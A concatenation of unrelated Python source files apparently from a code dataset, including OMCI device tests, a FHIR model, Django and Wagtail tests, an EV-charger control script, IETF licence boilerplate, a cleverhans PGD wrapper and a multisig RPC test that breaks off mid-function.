self.assertEqual(len(self.omci_agent.device_ids()), 1)
ch_entity = 0x102
unit_type = 255
clie_code = 'abc123'
prot_ptr = 0
def stuff_db(_results):
self._stuff_database([
(Cardholder.class_id, ch_entity, {'actual_plugin_unit_type': unit_type,
'actual_equipment_id': clie_code,
'protection_profile_pointer': prot_ptr,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
cardholder = config.cardholder_entities
self.assertTrue(isinstance(cardholder, dict))
self.assertEqual(len(cardholder), 1)
self.assertEqual(cardholder[ch_entity]['entity-id'], ch_entity)
self.assertEqual(cardholder[ch_entity]['is-single-piece'], ch_entity >= 256)
self.assertEqual(cardholder[ch_entity]['slot-number'], ch_entity & 0xFF)
self.assertEqual(cardholder[ch_entity]['actual-plug-in-type'], unit_type)
self.assertEqual(cardholder[ch_entity]['actual-equipment-id'], clie_code)
self.assertEqual(cardholder[ch_entity]['protection-profile-ptr'], prot_ptr)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_circuitpack_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
cp_entity = 0x100
num_ports = 1
serial_num = 'ABCD01234'
cp_version = '1234ABCD'
vendor_id = 'AB-9876'
tconts = 2
pqueues = 64
sched_count = 8
def stuff_db(_results):
self._stuff_database([
(CircuitPack.class_id, cp_entity, {'number_of_ports': num_ports,
'serial_number': serial_num,
'version': cp_version,
'vendor_id': vendor_id,
'total_tcont_buffer_number': tconts,
'total_priority_queue_number': pqueues,
'total_traffic_scheduler_number': sched_count,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
circuitpack = config.circuitpack_entities
self.assertTrue(isinstance(circuitpack, dict))
self.assertEqual(len(circuitpack), 1)
self.assertEqual(circuitpack[cp_entity]['entity-id'], cp_entity)
self.assertEqual(circuitpack[cp_entity]['number-of-ports'], num_ports)
self.assertEqual(circuitpack[cp_entity]['serial-number'], serial_num)
self.assertEqual(circuitpack[cp_entity]['version'], cp_version)
self.assertEqual(circuitpack[cp_entity]['vendor-id'], vendor_id)
self.assertEqual(circuitpack[cp_entity]['total-tcont-count'], tconts)
self.assertEqual(circuitpack[cp_entity]['total-priority-queue-count'], pqueues)
self.assertEqual(circuitpack[cp_entity]['total-traffic-sched-count'], sched_count)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_software_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
sw_entity = 0x200
sw_version = 'Beta-0.0.2'
sw_hash = md5("just_a_test").hexdigest()
prod_code = 'MySoftware'
sw_active = True
sw_committed = True
sw_valid = True
def stuff_db(_results):
self._stuff_database([
(SoftwareImage.class_id, sw_entity, {'version': sw_version,
'is_committed': sw_committed,
'is_active': sw_active,
'is_valid': sw_valid,
'product_code': prod_code,
'image_hash': sw_hash,
})])
def do_my_tests(_results):
config = self.onu_device.configuration
images = config.software_images
self.assertTrue(isinstance(images, list))
self.assertEqual(len(images), 1)
self.assertEqual(images[0].name, 'running-revision' if sw_active else 'candidate-revision')
self.assertEqual(images[0].version, sw_version)
self.assertEqual(images[0].is_active, 1 if sw_active else 0)
self.assertEqual(images[0].is_committed, 1 if sw_committed else 0)
self.assertEqual(images[0].is_valid, 1 if sw_valid else 0)
self.assertEqual(images[0].hash, sw_hash)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_ani_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
entity_id = 0x0106
tconts = 4
dba_report = 4
def stuff_db(_results):
self._stuff_database([
(AniG.class_id, entity_id, {'total_tcont_number': tconts,
'piggyback_dba_reporting': dba_report
})
])
def do_my_tests(_results):
config = self.onu_device.configuration
anig = config.ani_g_entities
self.assertTrue(isinstance(anig, dict))
self.assertEqual(len(anig), 1)
self.assertEqual(anig[entity_id]['entity-id'], entity_id)
self.assertEqual(anig[entity_id]['slot-number'], (entity_id >> 8) & 0xff)
self.assertEqual(anig[entity_id]['port-number'], entity_id & 0xff)
self.assertEqual(anig[entity_id]['total-tcont-count'], tconts)
self.assertEqual(anig[entity_id]['piggyback-dba-reporting'], dba_report)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
@deferred(timeout=5)
def test_in_sync_with_uni_g_values(self):
self.setup_one_of_each()
self.assertEqual(len(self.omci_agent.device_ids()), 1)
entity_id = 0x4321
mgmt_cap = 0
def stuff_db(_results):
self._stuff_database([
(UniG.class_id, entity_id, {'management_capability': mgmt_cap})
])
def do_my_tests(_results):
config = self.onu_device.configuration
unig = config.uni_g_entities
self.assertTrue(isinstance(unig, dict))
self.assertEqual(len(unig), 1)
self.assertEqual(unig[entity_id]['entity-id'], entity_id)
self.assertEqual(unig[entity_id]['management-capability'], mgmt_cap)
# No capabilities available until started
self.assertIsNone(self.onu_device.configuration)
# Yield context so that MIB Database callLater runs.
self.onu_device.start()
d = asleep(0.2)
d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
if __name__ == '__main__':
main()
|
py | 1a38b31d17c1b87ccc9a40b241bc648a6e949772 | class SocialContext:
def __init__(self, agentsPresent, theme):
#agents present in the current context
self.agentsPresent = agentsPresent
#collection of the characteristics present in the theme (each one with a name and a weight 0 to 1)
self.theme = theme
|
py | 1a38b34461ea53d141aa52ab2e10e0f2a4136513 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-09-09 09:40
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('test_tinymce', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='TestChildModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', tinymce.models.HTMLField(verbose_name='HTML Child Content')),
('parent', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='test_tinymce.TestModel')),
],
),
]
|
py | 1a38b37253881c1476230796a8c4dd4b39e5a49d | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/ContactPoint
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from pydantic import Field
from . import element, fhirtypes
class ContactPoint(element.Element):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Details of a Technology mediated contact point (phone, fax, email, etc.).
Details for all kinds of technology mediated contact points for a person or
organization, including telephone, email, etc.
"""
resource_type = Field("ContactPoint", const=True)
period: fhirtypes.PeriodType = Field(
None,
alias="period",
title="Time period when the contact point was/is in use",
description=None,
# if property is element of this resource.
element_property=True,
)
rank: fhirtypes.PositiveInt = Field(
None,
alias="rank",
title="Specify preferred order of use (1 = highest)",
description=(
"Specifies a preferred order in which to use a set of contacts. "
"Contacts are ranked with lower values coming before higher values."
),
# if property is element of this resource.
element_property=True,
)
rank__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_rank", title="Extension field for ``rank``."
)
system: fhirtypes.Code = Field(
None,
alias="system",
title="phone | fax | email | pager | url | sms | other",
description=(
"Telecommunications form for contact point - what communications system"
" is required to make use of the contact."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["phone", "fax", "email", "pager", "url", "sms", "other"],
)
system__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_system", title="Extension field for ``system``."
)
use: fhirtypes.Code = Field(
None,
alias="use",
title="home | work | temp | old | mobile - purpose of this contact point",
description="Identifies the purpose for the contact point.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["home", "work", "temp", "old", "mobile"],
)
use__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_use", title="Extension field for ``use``."
)
value: fhirtypes.String = Field(
None,
alias="value",
title="The actual contact point details",
description=(
"The actual contact point details, in a form that is meaningful to the "
"designated communication system (i.e. phone number or email address)."
),
# if property is element of this resource.
element_property=True,
)
value__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_value", title="Extension field for ``value``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``ContactPoint`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "system", "value", "use", "rank", "period"]
|
py | 1a38b492f8cf5894e87509718854277451347c18 | from __future__ import absolute_import, unicode_literals
import datetime
import pytest
from freezegun import freeze_time
from tests.factories.rule import ReferralRuleFactory, TimeRuleFactory
from tests.factories.segment import SegmentFactory
@pytest.mark.django_db
def test_no_segments(client, site):
response = client.get('/')
assert response.status_code == 200
assert client.session['segments'] == []
@pytest.mark.django_db
def test_referral_segment(client, site):
referral_segment = SegmentFactory(name='Referral')
ReferralRuleFactory(
regex_string="test.test",
segment=referral_segment
)
response = client.get('/', **{'HTTP_REFERER': 'test.test'})
assert response.status_code == 200
assert client.session['segments'][0]['encoded_name'] == 'referral'
@pytest.mark.django_db
@freeze_time("10:00:00")
def test_time_and_referral_segment(client, site):
segment = SegmentFactory(name='Both')
TimeRuleFactory(
start_time=datetime.time(8, 0, 0),
end_time=datetime.time(23, 0, 0),
segment=segment
)
ReferralRuleFactory(
regex_string="test.test",
segment=segment
)
response = client.get('/', **{'HTTP_REFERER': 'test.test'})
assert response.status_code == 200
assert client.session['segments'][0]['encoded_name'] == 'both'
@pytest.mark.django_db
@freeze_time("7:00:00")
def test_no_time_but_referral_segment(client, site):
segment = SegmentFactory(name='Not both')
TimeRuleFactory(
start_time=datetime.time(8, 0, 0),
end_time=datetime.time(23, 0, 0),
segment=segment
)
ReferralRuleFactory(
regex_string="test.test",
segment=segment
)
response = client.get('/', **{'HTTP_REFERER': 'test.test'})
assert response.status_code == 200
assert len(client.session['segments']) == 0
@pytest.mark.django_db
@freeze_time("9:00:00")
def test_time_but_no_referral_segment(client, site):
segment = SegmentFactory(name='Not both')
TimeRuleFactory(
start_time=datetime.time(8, 0, 0),
end_time=datetime.time(23, 0, 0),
segment=segment
)
ReferralRuleFactory(
regex_string="test.test",
segment=segment
)
response = client.get('/')
assert response.status_code == 200
assert len(client.session['segments']) == 0
|
py | 1a38b4af70d2ce2ea13b0e2fd71261468133b18d | from pyeasee import Easee
from authentication import easee_user, easee_password
async def set_all_charger_states(should_charge, logging_function):
"""Pause or resume all connected easee chargers. Returns True if the state was changed, False if no change was made."""
# pyeasee most likely automatically refreshes the authentication token
# but setup every time just to be safe and because calling the function via the telegram thread broke otherwise
easee = Easee(easee_user, easee_password)
chargers = await easee.get_chargers()
for charger in chargers:
state = await charger.get_state()
operating_mode = state["chargerOpMode"]
print(f"Charger: '{charger.name}' - Status: {operating_mode}")
if operating_mode == "CHARGING" and not should_charge:
logging_function(f"Genug Saft gezogen. Wallbox '{charger.name}' wird abgeschaltet.")
await charger.pause()
elif operating_mode == "AWAITING_START" and should_charge:
logging_function(f"Ich gรถnn dir noch n bisschen Strom bei Wallbox '{charger.name}'.")
await charger.resume()
await easee.close() |
py | 1a38b6e97673ba18f661bee21663c70ec7d40b28 | class Mail:
def __init__(self, application, driver_config=None):
self.application = application
self.drivers = {}
self.driver_config = driver_config or {}
self.options = {}
def add_driver(self, name, driver):
self.drivers.update({name: driver})
def set_configuration(self, config):
self.driver_config = config
return self
def get_driver(self, name=None):
if name is None:
return self.drivers[self.driver_config.get("default")]
return self.drivers[name]
def get_config_options(self, driver=None):
if driver is None:
return self.driver_config.get(self.driver_config.get("default"), {})
return self.driver_config.get(driver, {})
def mailable(self, mailable):
self.options = mailable.set_application(self.application).build().get_options()
return self
def send(self, driver=None):
selected_driver = driver or self.options.get("driver", None)
config_options = self.get_config_options(selected_driver)
# if an option has already been defined in a mailable use it
if self.options.get("from"):
config_options.pop("from", None)
self.options.update(config_options)
return self.get_driver(selected_driver).set_options(self.options).send()
|
py | 1a38b6f3b5e2328521c7db37602e2a35368c5d57 | # 'trust200902',
# 'noModificationTrust200902',
# 'noDerivativesTrust200902',
# 'pre5378Trust200902',
# 'trust200811',
# 'noModificationTrust200811',
# 'noDerivativesTrust200811',
boilerplate_tlp = {
"2.0": {
# From https://trustee.ietf.org/license-info/IETF-TLP-2.htm
"draft": [
"""<t>
This Internet-Draft is submitted in full conformance
with the provisions of BCP 78 and BCP 79.
</t>""",
],
"n/a": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as
the document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents in effect on the date of
publication of this document (http://trustee.ietf.org/license-info).
Please review these documents carefully, as they describe your rights
and restrictions with respect to this document.
</t>""",
],
"noModification": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, except to format it for publication as an RFC or
to translate it into languages other than English.
</t>""",
],
"noDerivatives": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, and it may not be published except as an
Internet-Draft.
</t>""",
],
"pre5378": [
"""<t>
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s)
controlling the copyright in such materials, this document may not
be modified outside the IETF Standards Process, and derivative
works of it may not be created outside the IETF Standards Process,
except to format it for publication as an RFC or to translate it
into languages other than English.
</t>""",
],
},
"3.0": {
# From https://trustee.ietf.org/license-info/IETF-TLP-3.htm
"draft": [
"""<t>
This Internet-Draft is submitted to IETF in full conformance with
the provisions of BCP 78 and BCP 79.
</t>""",
],
"n/a": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as
the document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(http://trustee.ietf.org/license-info) in effect on the date of
publication of this document. Please review these documents carefully,
as they describe your rights and restrictions with respect to this
document. Code Components extracted from this document must include
Simplified BSD License text as described in Section 4.e of the Trust
Legal Provisions and are provided without warranty as described in the
BSD License.
</t>""",
],
"noModification": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, except to format it for publication as an RFC or
to translate it into languages other than English.
</t>""",
],
"noDerivatives": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, and it may not be published except as an
Internet-Draft.
</t>""",
],
"pre5378": [
"""<t>
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s)
controlling the copyright in such materials, this document may not
be modified outside the IETF Standards Process, and derivative
works of it may not be created outside the IETF Standards Process,
except to format it for publication as an RFC or to translate it
into languages other than English.
</t>""",
],
},
"4.0": {
# From https://trustee.ietf.org/license-info/IETF-TLP-4.htm
"draft": [
"""<t>
This Internet-Draft is submitted in full conformance with the
provisions of BCP 78 and BCP 79.
</t>""",
],
"IETF": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as the document
authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(http://trustee.ietf.org/license-info) in effect on the date of
publication of this document. Please review these documents carefully,
as they describe your rights and restrictions with respect to this
document. Code Components extracted from this document must include
Simplified BSD License text as described in Section 4.e of the Trust
Legal Provisions and are provided without warranty as described in the
Simplified BSD License.
</t>""",
],
"alt": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as the
document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(http://trustee.ietf.org/license-info) in effect on the date of
publication of this document. Please review these documents
carefully, as they describe your rights and restrictions with
respect to this document.
</t>""",
],
"noModification": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, except to format it for publication as an RFC or
to translate it into languages other than English.
</t>""",
],
"noDerivatives": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, and it may not be published except as an
Internet-Draft.
</t>""",
],
"pre5378": [
"""<t>
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s)
controlling the copyright in such materials, this document may not
be modified outside the IETF Standards Process, and derivative
works of it may not be created outside the IETF Standards Process,
except to format it for publication as an RFC or to translate it
into languages other than English.
</t>""",
],
},
"5.0": {
# From https://trustee.ietf.org/license-info/IETF-TLP-5.htm
"draft": [
"""<t>
This Internet-Draft is submitted in full conformance with the
provisions of BCP 78 and BCP 79.
</t>""",
],
"IETF": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as the
document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(<eref target="{scheme}://trustee.ietf.org/license-info"/>) in effect on the date of
publication of this document. Please review these documents
carefully, as they describe your rights and restrictions with
respect to this document. Code Components extracted from this
document must include Revised BSD License text as described in
Section 4.e of the Trust Legal Provisions and are provided without
warranty as described in the Revised BSD License.
</t>""",
],
"alt": [
"""<t>
Copyright (c) {year} IETF Trust and the persons identified as the
document authors. All rights reserved.
</t>""",
"""<t>
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(<eref target="{scheme}://trustee.ietf.org/license-info"/>) in effect on the date of
publication of this document. Please review these documents
carefully, as they describe your rights and restrictions with
respect to this document.
</t>""",
],
"noModification": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, except to format it for publication as an RFC or
to translate it into languages other than English.
</t>""",
],
"noDerivatives": [
"""<t>
This document may not be modified, and derivative works of it may
not be created, and it may not be published except as an
Internet-Draft.
</t>""",
],
"pre5378": [
"""<t>
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s)
controlling the copyright in such materials, this document may not
be modified outside the IETF Standards Process, and derivative
works of it may not be created outside the IETF Standards Process,
except to format it for publication as an RFC or to translate it
into languages other than English.
</t>""",
],
},
}
|
py | 1a38b79cb3a9c356dc4bf9ff1a8fcae7157ce7bd | import numpy as np
from cleverhans.attacks import ProjectedGradientDescent
from tools.cleverhans.adversarial_attack import AdversarialAttack
class PGDAttack(AdversarialAttack):
def __init__(self, model, targeted=False, step_size_iter=0.05, max_perturbation=0.3, n_iterations=10,
norm_order=np.inf, rand_init=None, rand_minmax=0.3, clip_min=None, clip_max=None, sanity_checks=True):
super().__init__(model=model, clip_min=clip_min, clip_max=clip_max)
self._targeted = targeted
self._step_size_iter = step_size_iter
self._max_perturbation = max_perturbation
self._n_iterations = n_iterations
self._norm_order = norm_order
self._rand_init = rand_init
self._rand_minmax = rand_minmax
self._sanity_checks = sanity_checks
with self.graph.as_default():
self._method = ProjectedGradientDescent(self._model, sess=self.session, eps=self._max_perturbation,
eps_iter=self._step_size_iter, nb_iter=self._n_iterations,
ord=self._norm_order, rand_init=self._rand_init,
clip_min=self._clip_min, clip_max=self._clip_max,
sanity_checks=self._sanity_checks)
def attack_method(self, labels):
if labels is not None:
if self._targeted:
return self._method.generate(x=self._x_clean, y_target=labels, rand_minmax=self._rand_minmax)
else:
return self._method.generate(x=self._x_clean, y=labels, rand_minmax=self._rand_minmax)
return self._method.generate(x=self._x_clean, rand_minmax=self._rand_minmax)
|
py | 1a38b79eb90ebc3c9afa31b8fbb78aa0b2a776ee | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle
import os
import warnings
import paddle.utils.cpp_extension.extension_utils as utils
class TestABIBase(unittest.TestCase):
def test_environ(self):
compiler_list = ['gcc', 'cl']
for compiler in compiler_list:
for flag in ['1', 'True', 'true']:
os.environ['PADDLE_SKIP_CHECK_ABI'] = flag
self.assertTrue(utils.check_abi_compatibility(compiler))
def del_environ(self):
key = 'PADDLE_SKIP_CHECK_ABI'
if key in os.environ:
del os.environ[key]
class TestCheckCompiler(TestABIBase):
def test_expected_compiler(self):
if utils.OS_NAME.startswith('linux'):
gt = ['gcc', 'g++', 'gnu-c++', 'gnu-cc']
elif utils.IS_WINDOWS:
gt = ['cl']
elif utils.OS_NAME.startswith('darwin'):
gt = ['clang', 'clang++']
self.assertListEqual(utils._expected_compiler_current_platform(), gt)
def test_compiler_version(self):
# clear environ
self.del_environ()
if utils.OS_NAME.startswith('linux'):
compiler = 'g++'
elif utils.IS_WINDOWS:
compiler = 'cl'
# Linux: all CI gcc version > 5.4.0
# Windows: all CI MSVC version > 19.00.24215
# Mac: clang has no version limitation, always return true
self.assertTrue(utils.check_abi_compatibility(compiler, verbose=True))
def test_wrong_compiler_warning(self):
# clear environ
self.del_environ()
compiler = 'python' # fake wrong compiler
with warnings.catch_warnings(record=True) as error:
flag = utils.check_abi_compatibility(compiler, verbose=True)
# check return False
self.assertFalse(flag)
# check Compiler Compatibility WARNING
self.assertTrue(len(error) == 1)
self.assertTrue(
"Compiler Compatibility WARNING" in str(error[0].message))
def test_exception(self):
# clear environ
self.del_environ()
compiler = 'python' # fake command
if utils.OS_NAME.startswith('linux'):
def fake():
return [compiler]
# mock a fake function
raw_func = utils._expected_compiler_current_platform
utils._expected_compiler_current_platform = fake
with warnings.catch_warnings(record=True) as error:
flag = utils.check_abi_compatibility(compiler, verbose=True)
# check return False
self.assertFalse(flag)
# check ABI Compatibility WARNING
self.assertTrue(len(error) == 1)
self.assertTrue("Failed to check compiler version for" in
str(error[0].message))
# restore
utils._expected_compiler_current_platform = raw_func
class TestJITCompilerException(unittest.TestCase):
def test_exception(self):
with self.assertRaisesRegexp(RuntimeError,
"Failed to check Python interpreter"):
file_path = os.path.abspath(__file__)
utils._jit_compile(file_path, interpreter='fake_cmd', verbose=True)
class TestRunCMDException(unittest.TestCase):
def test_exception(self):
for verbose in [True, False]:
with self.assertRaisesRegexp(RuntimeError, "Failed to run command"):
cmd = "fake cmd"
utils.run_cmd(cmd, verbose)
if __name__ == '__main__':
unittest.main()
|
py | 1a38b83634a32daa6697431bc2c6c6929ff2a557 |
def melt(df):
"""Melt a census dataframe into two value columns, for the estimate and margin"""
import pandas as pd
# Intial melt
melted = pd.melt(df, id_vars=list(df.columns[:9]), value_vars=list(df.columns[9:]))
melted = melted[['gvid', 'variable', 'value']]
# Make two seperate frames for estimates and margins.
estimates = melted[~melted.variable.str.contains('_m90')].set_index(['gvid', 'variable'])
margins = melted[melted.variable.str.contains('_m90')].copy()
margins.columns = ['gvid', 'ovariable', 'm90']
margins['variable'] = margins.ovariable.str.replace('_m90', '')
# Join the estimates to the margins.
final = estimates.join(margins.set_index(['gvid', 'variable']).drop('ovariable', 1))
return final
# From http://stackoverflow.com/a/295466
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
and converts spaces to hyphens.type(
"""
import re
import unicodedata
from six import text_type
value = text_type(value)
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('utf8')
value = re.sub(r'[^\w\s-]', '-', value).strip().lower()
value = re.sub(r'[-\s]+', '-', value)
return value
CACHE_NAME = 'pandasreporter'
def nl2br(v, is_xhtml= True ):
if is_xhtml:
return v.replace('\n','<br />\n')
else :
return v.replace('\n','<br>\n') |
py | 1a38b9696a67e9ddacbea20d8d02536ac7e9da26 | #!/usr/bin/env python3
# Copyright (c) 2015-2020 The Beans Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multisig RPCs"""
import binascii
import decimal
import itertools
import json
import os
from test_framework.authproxy import JSONRPCException
from test_framework.descriptors import descsum_create, drop_origins
from test_framework.key import ECPubKey, ECKey
from test_framework.test_framework import BeansTestFramework
from test_framework.util import (
assert_raises_rpc_error,
assert_equal,
)
from test_framework.wallet_util import bytes_to_wif
class RpcCreateMultiSigTest(BeansTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def get_keys(self):
self.pub = []
self.priv = []
node0, node1, node2 = self.nodes
for _ in range(self.nkeys):
k = ECKey()
k.generate()
self.pub.append(k.get_pubkey().get_bytes().hex())
self.priv.append(bytes_to_wif(k.get_bytes(), k.is_compressed))
self.final = node2.getnewaddress()
def run_test(self):
node0, node1, node2 = self.nodes
self.check_addmultisigaddress_errors()
self.log.info('Generating blocks ...')
node0.generate(149)
self.sync_all()
self.moved = 0
for self.nkeys in [3, 5]:
for self.nsigs in [2, 3]:
for self.output_type in ["bech32", "p2sh-segwit", "legacy"]:
self.get_keys()
self.do_multisig()
self.checkbalances()
# Test mixed compressed and uncompressed pubkeys
self.log.info('Mixed compressed and uncompressed multisigs are not allowed')
pk0 = node0.getaddressinfo(node0.getnewaddress())['pubkey']
pk1 = node1.getaddressinfo(node1.getnewaddress())['pubkey']
pk2 = node2.getaddressinfo(node2.getnewaddress())['pubkey']
# decompress pk2
pk_obj = ECPubKey()
pk_obj.set(binascii.unhexlify(pk2))
pk_obj.compressed = False
pk2 = binascii.hexlify(pk_obj.get_bytes()).decode()
node0.createwallet(wallet_name='wmulti0', disable_private_keys=True)
wmulti0 = node0.get_wallet_rpc('wmulti0')
# Check all permutations of keys because order matters apparently
for keys in itertools.permutations([pk0, pk1, pk2]):
# Results should be the same as this legacy one
legacy_addr = node0.createmultisig(2, keys, 'legacy')['address']
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'legacy')['address'])
# Generate addresses with the segwit types. These should all make legacy addresses
assert_equal(legacy_addr, wmulti0.createmultisig(2, keys, 'bech32')['address'])
assert_equal(legacy_addr, wmulti0.createmultisig(2, keys, 'p2sh-segwit')['address'])
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'bech32')['address'])
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'p2sh-segwit')['address'])
self.log.info('Testing sortedmulti descriptors with BIP 67 test vectors')
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/rpc_bip67.json'), encoding='utf-8') as f:
vectors = json.load(f)
for t in vectors:
key_str = ','.join(t['keys'])
desc = descsum_create('sh(sortedmulti(2,{}))'.format(key_str))
assert_equal(self.nodes[0].deriveaddresses(desc)[0], t['address'])
sorted_key_str = ','.join(t['sorted_keys'])
sorted_key_desc = descsum_create('sh(multi(2,{}))'.format(sorted_key_str))
assert_equal(self.nodes[0].deriveaddresses(sorted_key_desc)[0], t['address'])
def check_addmultisigaddress_errors(self):
if self.options.descriptors:
return
self.log.info('Check that addmultisigaddress fails when the private keys are missing')
addresses = [self.nodes[1].getnewaddress(address_type='legacy') for _ in range(2)]
assert_raises_rpc_error(-5, 'no full public key for address', lambda: self.nodes[0].addmultisigaddress(nrequired=1, keys=addresses))
for a in addresses:
# Importing all addresses should not change the result
self.nodes[0].importaddress(a)
assert_raises_rpc_error(-5, 'no full public key for address', lambda: self.nodes[0].addmultisigaddress(nrequired=1, keys=addresses))
def checkbalances(self):
node0, node1, node2 = self.nodes
node0.generate(100)
self.sync_all()
bal0 = node0.getbalance()
bal1 = node1.getbalance()
bal2 = node2.getbalance()
height = node0.getblockchaininfo()["blocks"]
assert 150 < height < 350
total = 149 * 50 + (height - 149 - 100) * 25
assert bal1 == 0
assert bal2 == self.moved
assert bal0 + bal1 + bal2 == total
def do_multisig(self):
node0, node1, node2 = self.nodes
if 'wmulti' not in node1.listwallets():
try:
node1.loadwallet('wmulti')
except JSONRPCException as e:
path = os.path.join(self.options.tmpdir, "node1", "regtest", "wallets", "wmulti")
if e.error['code'] == -18 and "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path) in e.error['message']:
node1.createwallet(wallet_name='wmulti', disable_private_keys=True)
else:
raise
wmulti = node1.get_wallet_rpc('wmulti')
# Construct the expected descriptor
desc = 'multi({},{})'.format(self.nsigs, ','.join(self.pub))
if self.output_type == 'legacy':
desc = 'sh({})'.format(desc)
elif self.output_type == 'p2sh-segwit':
desc = 'sh(wsh({}))'.format(desc)
elif self.output_type == 'bech32':
desc = 'wsh({})'.format(desc)
desc = descsum_create(desc)
msig = node2.createmultisig(self.nsigs, self.pub, self.output_type)
madd = msig["address"]
mredeem = msig["redeemScript"]
assert_equal(desc, msig['descriptor'])
if self.output_type == 'bech32':
assert madd[0:4] == "bcrt" # actually a bech32 address
# compare against addmultisigaddress
